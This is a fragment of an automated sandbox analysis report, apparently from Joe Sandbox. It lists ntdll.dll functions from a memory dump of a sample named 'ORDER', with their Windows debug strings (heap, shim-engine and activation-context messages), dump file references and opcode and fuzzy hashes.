                          control_flow_graph 586 32457550-32457571 587 32457573-3245758f call 3242e580 586->587 588 324575ab-324575b9 call 32464b50 586->588 593 32457595-324575a2 587->593 594 32494443 587->594 595 324575a4 593->595 596 324575ba-324575c9 call 32457738 593->596 598 3249444a-32494450 594->598 595->588 602 32457621-3245762a 596->602 603 324575cb-324575e1 call 324576ed 596->603 600 324575e7-324575f0 call 32457648 598->600 601 32494456-324944c3 call 324aef10 call 32468f40 RtlDebugPrintTimes BaseQueryModuleData 598->601 600->602 611 324575f2 600->611 601->600 618 324944c9-324944d1 601->618 606 324575f8-32457601 602->606 603->598 603->600 613 32457603-32457612 call 3245763b 606->613 614 3245762c-3245762e 606->614 611->606 615 32457614-32457616 613->615 614->615 620 32457630-32457639 615->620 621 32457618-3245761a 615->621 618->600 623 324944d7-324944de 618->623 620->621 621->595 622 3245761c 621->622 624 324945c9-324945db call 32462b70 622->624 623->600 625 324944e4-324944ef 623->625 624->595 627 324944f5-3249452e call 324aef10 call 3246a9c0 625->627 628 324945c4 call 32464c68 625->628 635 32494530-32494541 call 324aef10 627->635 636 32494546-32494576 call 324aef10 627->636 628->624 635->602 636->600 641 3249457c-3249458a call 3246a690 636->641 644 3249458c-3249458e 641->644 645 32494591-324945ae call 324aef10 call 3249cc1e 641->645 644->645 645->600 650 324945b4-324945bd 645->650 650->641 651 324945bf 650->651 651->600
                          Strings
                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3249454D
                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 32494507
                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 32494460
                          • Execute=1, xrefs: 3249451E
                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 32494592
                          • ExecuteOptions, xrefs: 324944AB
                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 32494530
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                          • API String ID: 0-484625025
                          • Opcode ID: cb2b96a8454cbca6ba65e14ee0fab67bf4d4f8d5886ae3f52258d6f502edbeff
                          • Instruction ID: 685ccd2c54678043636b650156827762a67b35b2359550785cd445841b4bd789
                          • Opcode Fuzzy Hash: cb2b96a8454cbca6ba65e14ee0fab67bf4d4f8d5886ae3f52258d6f502edbeff
                          • Instruction Fuzzy Hash: F5510671A013197AEF109EA4ED94FED77A8EF08754F5004F9EA45A7280EB709A85CF60
                          Strings
                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32487807
                          • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 324878F3
                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 324877DD, 32487802
                          • Actx , xrefs: 32487819, 32487880
                          • SsHd, xrefs: 3243A304
                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 324877E2
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                          • API String ID: 0-1988757188
                          • Opcode ID: a162f2e2f3bd1a6db6e4277145ab0433f0d01dfad2914e2ddba9ee75f27425dd
                          • Instruction ID: 2692ebe29d4e5aa7089ced8950b2903c04319600c08082c52f4bb7482ab0d2c6
                          • Opcode Fuzzy Hash: a162f2e2f3bd1a6db6e4277145ab0433f0d01dfad2914e2ddba9ee75f27425dd
                          • Instruction Fuzzy Hash: 59E106796453218FE706CF24C99075A77E1BF88368F104A2DEE65CB390DB72D895CB82
                          APIs
                          Strings
                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32489178
                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 3248914E, 32489173
                          • Actx , xrefs: 32489315
                          • GsHd, xrefs: 3243D794
                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32489153
                          • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 32489372
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                          • API String ID: 3446177414-2196497285
                          • Opcode ID: 95eff07b70455f2d17392af09612b5219da51cfea85cfb37d880f8125243be52
                          • Instruction ID: 8aa322b054818cafd0103fe93eee77c6b53aa547dd2bbcd82b6a9b062b88475e
                          • Opcode Fuzzy Hash: 95eff07b70455f2d17392af09612b5219da51cfea85cfb37d880f8125243be52
                          • Instruction Fuzzy Hash: A8E1D174609741DFE706CF14C880B5AB7E4BF8C758F404A2DEAA58B381DB71E895CB92
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                          • API String ID: 3446177414-4227709934
                          • Opcode ID: d8e495db70caec93d412abcd154224156d15346c352ca643fff9b8ca6cf82d52
                          • Instruction ID: bf382b62741db2a269fcfb0ce77492eee2ab9896c86ddb953d8b3ac733f40db4
                          • Opcode Fuzzy Hash: d8e495db70caec93d412abcd154224156d15346c352ca643fff9b8ca6cf82d52
                          • Instruction Fuzzy Hash: AF4146B9A01209ABDF01CF99C984ADEBFB5BF48754F124069ED04A7350DB71AA81CB90
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: $$@$@wEw
                          • API String ID: 3446177414-2435863765
                          • Opcode ID: c187999ac4bb4b157dd1fac7bd58093c3ec49e89fb1392e1c83a81353e350610
                          • Instruction ID: 385f833fb5e9f28f52d5234b88c8d036858de4856b21398c4c7490a0be9522af
                          • Opcode Fuzzy Hash: c187999ac4bb4b157dd1fac7bd58093c3ec49e89fb1392e1c83a81353e350610
                          • Instruction Fuzzy Hash: 35814BB1D012699BDB25CF54CC40BDEB7B8AF08714F1041EAEA09B7240EB719E85CFA0
                          APIs
                          Strings
                          • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32479843
                          • LdrpLoadShimEngine, xrefs: 3247984A, 3247988B
                          • minkernel\ntdll\ldrinit.c, xrefs: 32479854, 32479895
                          • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32479885
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                          • API String ID: 3446177414-3589223738
                          • Opcode ID: 1c69f7e755dfb2459d9364985593bea9e415858cf69e9b5859d375f1e26021eb
                          • Instruction ID: b700472ad663623edb5f38a1eb1cdda5f2908501cfc9ce0f2cfd7822178622f8
                          • Opcode Fuzzy Hash: 1c69f7e755dfb2459d9364985593bea9e415858cf69e9b5859d375f1e26021eb
                          • Instruction Fuzzy Hash: 74511135A113549FEB04DFA8C854BDD77A6AF48704F450569E921BF295CBB0EE82CB80
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                          • API String ID: 3446177414-3224558752
                          • Opcode ID: 89eef14576908173e325394e33347c6781302c7776a9aa6ec073a58a2556fee5
                          • Instruction ID: 5ee2ef24077b08b802d337d29004705d4f21834ebe1df8b859256afcfc0c9e1c
                          • Opcode Fuzzy Hash: 89eef14576908173e325394e33347c6781302c7776a9aa6ec073a58a2556fee5
                          • Instruction Fuzzy Hash: B3414534620701EFF712CF64C444B5AB7A4FF44764F1189AAE805A7781CF79A982CB91
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                          • API String ID: 3446177414-1222099010
                          • Opcode ID: c0aab69e37f2cb672a77e898af82ca81540e07ad43c0a87326da6705571daa47
                          • Instruction ID: 0900367d9d4c0b54c23a5475f203184b0b5792713b07a6e825492ee8a4aa73b6
                          • Opcode Fuzzy Hash: c0aab69e37f2cb672a77e898af82ca81540e07ad43c0a87326da6705571daa47
                          • Instruction Fuzzy Hash: 773136752217C4EFF726CF24C408F4977E4EF05764F064499E84157B92CFBAAA82CA51
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: D2
                          • API String ID: 0-829058886
                          • Opcode ID: 174d62665f76eba8451648c436c7cf58e7d2c379aa2b40dc67e4e81c635e6bc2
                          • Instruction ID: 48b54a9432b1f9b9be27d9536223ee674df73823f2b8743a4efe30dc097dd81d
                          • Opcode Fuzzy Hash: 174d62665f76eba8451648c436c7cf58e7d2c379aa2b40dc67e4e81c635e6bc2
                          • Instruction Fuzzy Hash: 04E1EF75E00708DFEB25CFA9C980A9DBBF1BF48304F21452AE956A7760DB71A981CF50
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                          • API String ID: 3446177414-3610490719
                          • Opcode ID: ccad8da3bca209ef241da8200428c8f667f898e1ded375505098dcb64730035b
                          • Instruction ID: 01bfc29b4a4d0986f8212c3dda1941da6fd4c153e49c34e62d0caafb6ca8b564
                          • Opcode Fuzzy Hash: ccad8da3bca209ef241da8200428c8f667f898e1ded375505098dcb64730035b
                          • Instruction Fuzzy Hash: F2912371314750AFE71ADF28C840B6AB7A5BF48B44F050559E9609B386DB78F883CBD2
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: Wow64 Emulation Layer
                          • API String ID: 3446177414-921169906
                          • Opcode ID: 35a384e6b6e982fed0ae8d77aebccc134786bce51c7d142baa9f8486e87928b8
                          • Instruction ID: ac46f616d63f248c652638fbde7023587bdf17794ae043a1fa2a50ca009ad7ea
                          • Opcode Fuzzy Hash: 35a384e6b6e982fed0ae8d77aebccc134786bce51c7d142baa9f8486e87928b8
                          • Instruction Fuzzy Hash: 62210876A0115DBFEB029BA1DD88CFF7B7CEF58699B004058FA11A2104DB31AE51DB60
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          • Opcode ID: bb1ab483e9e1a8db411db8098361fa8149e4251f8c8368060e0509299407b03e
                          • Instruction ID: 559b861c73f6bd3658508725c4bf591a032c398f23d09118c45955247877bd0e
                          • Opcode Fuzzy Hash: bb1ab483e9e1a8db411db8098361fa8149e4251f8c8368060e0509299407b03e
                          • Instruction Fuzzy Hash: C25133B1E01318AFDF08CF95D945ADDBBB5BF48354F05812AE805AB290DB31A941CF94
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: @
                          • API String ID: 0-2766056989
                          • Opcode ID: 6f31f4743e4c927b2431511b924afdaf54178f19991bec4128e471b6192e56ed
                          • Instruction ID: ef9fac587cd1d4762ffe7b256f662f496578141ec92f0fc51b23f91725e3b527
                          • Opcode Fuzzy Hash: 6f31f4743e4c927b2431511b924afdaf54178f19991bec4128e471b6192e56ed
                          • Instruction Fuzzy Hash: 9A324574D10369DFEB29CF65C984BD9BBB0BF08304F0080E9D949A7241EBB59A85CF91
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: HEAP: ${L2
                          • API String ID: 0-3243362235
                          • Opcode ID: a933d0165c3d385ca5e543c73725e62853c97675fc5fbd532c0331e59dceced0
                          • Instruction ID: 8997367ed1e53ba5d4b4124d05ecfa4fce5a9e7fd1cc44a56acc0a017fc4ca1a
                          • Opcode Fuzzy Hash: a933d0165c3d385ca5e543c73725e62853c97675fc5fbd532c0331e59dceced0
                          • Instruction Fuzzy Hash: A4B1CDB9609321AFD711CF28D880A5BBBE5BF84758F404A2EF995DB350DB30D944CB92
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0$Flst
                          • API String ID: 0-758220159
                          • Opcode ID: 924dd0bfb545367e5309797a56f6dc4acdf71dd98bfa0623b22359ff9d3c66d8
                          • Instruction ID: 4e7fa18e9c6c81380bdabef188ccf25957e136f24561b3687c7300d630481f80
                          • Opcode Fuzzy Hash: 924dd0bfb545367e5309797a56f6dc4acdf71dd98bfa0623b22359ff9d3c66d8
                          • Instruction Fuzzy Hash: 8E51AFB5E012488FEB26CF96D48479DFBF4EF85754F25842DD4859F240EBB09981CB90
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: ^A2
                          • API String ID: 3446177414-2229306465
                          • Opcode ID: 453626b4b12dcab7747cc9676872cd8d93382a7be98efe3df5ae9a018311c52e
                          • Instruction ID: 82c6f778802b8eedd35be2f8585151fc3142a38050494342b61ee5ebaac0cbe6
                          • Opcode Fuzzy Hash: 453626b4b12dcab7747cc9676872cd8d93382a7be98efe3df5ae9a018311c52e
                          • Instruction Fuzzy Hash: 5C417CB9A00201DFDB15CF2AC4845557BE6FF99B50B94806AEC098B361DB71F991CBA0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: A2$mA2
                          • API String ID: 3446177414-3008304424
                          • Opcode ID: f07ed0b32ad8a5280ed3e407d7a422244492bbf8a595e4736706b7be92109fa3
                          • Instruction ID: ad48414c8b8e1d00b14d01428897ec2215831b30d55c0e69aa9b33a742747518
                          • Opcode Fuzzy Hash: f07ed0b32ad8a5280ed3e407d7a422244492bbf8a595e4736706b7be92109fa3
                          • Instruction Fuzzy Hash: 9F11C3B6A01208AFDF11CF98D985ADEBBB8FF4C360F10401AF911B7244D775AA54CBA0